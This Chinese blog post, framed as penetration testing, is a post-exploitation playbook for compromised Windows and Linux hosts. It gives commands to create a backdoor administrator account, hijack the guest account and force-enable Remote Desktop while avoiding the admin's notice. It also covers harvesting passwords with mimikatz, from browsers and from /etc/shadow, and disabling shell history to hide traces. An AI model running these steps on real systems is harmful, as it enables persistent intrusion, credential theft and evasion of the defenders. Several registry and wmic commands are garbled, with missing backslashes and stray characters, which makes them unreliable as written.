• 获取Shell后的操作


    对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。

    Windows

    当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢?

    第一步,先 whoami  查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得想办法提权了。提权之后,利用mimikatz获取用户密码。如果是域环境的话,还可以获取登录过该主机的域用户密码。传送门——> 使用 mimikatz 破解windows登录密码

    或者我们可以反弹一个MSF类型的shell到kali中,传送门——> 反弹MSF类型的Shell    ,  MSF之后渗透阶段

    以下命令是在Windows主机渗透测试过程中可以用到的

    #信息探测
    ipconfig       #查看ip等信息
    systeminfo     #查看系统信息
    netstat -ano   #查看端口开放信息
    tasklist /svc  #查看进程信息
    net user       #查看主机用户
    net localgroup #查看主机组
    net share      #查看开放的共享
    net view       #查看内网主机信息
    
    
    #添加用户后门
    net user hack 123 /add                   #添加用户并设置密码
    net localgroup administrators hack /add  #将用户加入管理组
    net user guest /active:yes               #激活guest用户
    net user guest mstlab                    #更改guest用户的密码

    更多Windows CMD窗口的命令,传送门——> Windows常见的cmd命令

    如果对方主机没开3389端口怎么办?以下命令可以开启远程桌面服务,前提是管理员权限。

    1.通用开3389(优化后):
      wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
    2.For Win2003:
      REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    3.For Win2008:
      REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    4.For Every:
      win08,三条命令即可,win2012通用;win7前两条即可。权限需要administrator。
      wmic /namespace:
    ootcimv2	erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
      wmic /namespace:
    ootcimv2	erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
      reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
    

    创建了后门用户,开启了远程桌面,我们就可以远程连接了。但是这里要注意,远程连接前判断该用户是否在线,万一对方管理员在线,你把人家给挤下去了,这样一下子就暴露了。开启远程桌面前慎重,慎重再慎重。

    远程桌面登录后,我们查看桌面上有哪些软件,我们要找的目标有以下。

    • FTP相关的软件
    • 数据库相关的软件
    • 打开浏览器,查看历史记录,查看某些网站是否保存有用户密码。利用工具查看浏览器保存的密码

    总结:获得了权限之后,尽一切可能搜集该主机的信息,该主机上各种服务的用户名和密码。为接下来的内网渗透弱口令爆破做准备。

    Linux

    在获得了Linux主机的权限后。第一步,我们要做的就是让我们接下来操作的所有命令不在主机上留下任何痕迹。我们可以执行下面的命令,这样我们接下来执行的所有命令都不会在 .bash_history中看到了。这条命令只对当前终端有效!

    export HISTFILE=/dev/null export HISTSIZE=0

    先查看当前用户身份,是否是root权限身份,如果不是的话,查看系统版本,是否可以利用已知漏洞提权的,比如 CVE-2016-5195 。 Linux下用SUID提权

    然后要做的自然就是维持权限了,传送门——>  Linux获取权限

    whoami       #查看当前用户身份
    uname -a     #查看系统信息
    history      #查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等
    last         #查看登录历史
    cat /etc/passwd  #查看用户
    cat /etc/shadow  #查看密码

    未完待更新。。

    相关文章:Linux 主机超全渗透测试命令汇总

  • 相关阅读:
    ReportingService 通过RowNumber函数获取行号和生成隔行变色样式
    C#中Attribute的继承
    在ASP.NET非MVC环境中(WebForm中)构造MVC的URL参数,以及如何根据URL解析出匹配到MVC路由的Controller和Action
    _kbhit() for linux
    pthread_create用法(转)
    XACT Q&A (转)
    libcurl使用心得-包括下载文件不存在处理相关(转)
    2013总结-2014展望
    curl常用设置-涉及超时相关
    一行代码让App运行时iPhone不会进入锁屏待机状态
  • 原文地址:https://www.cnblogs.com/csnd/p/11807663.html
Copyright © 2020-2023  润新知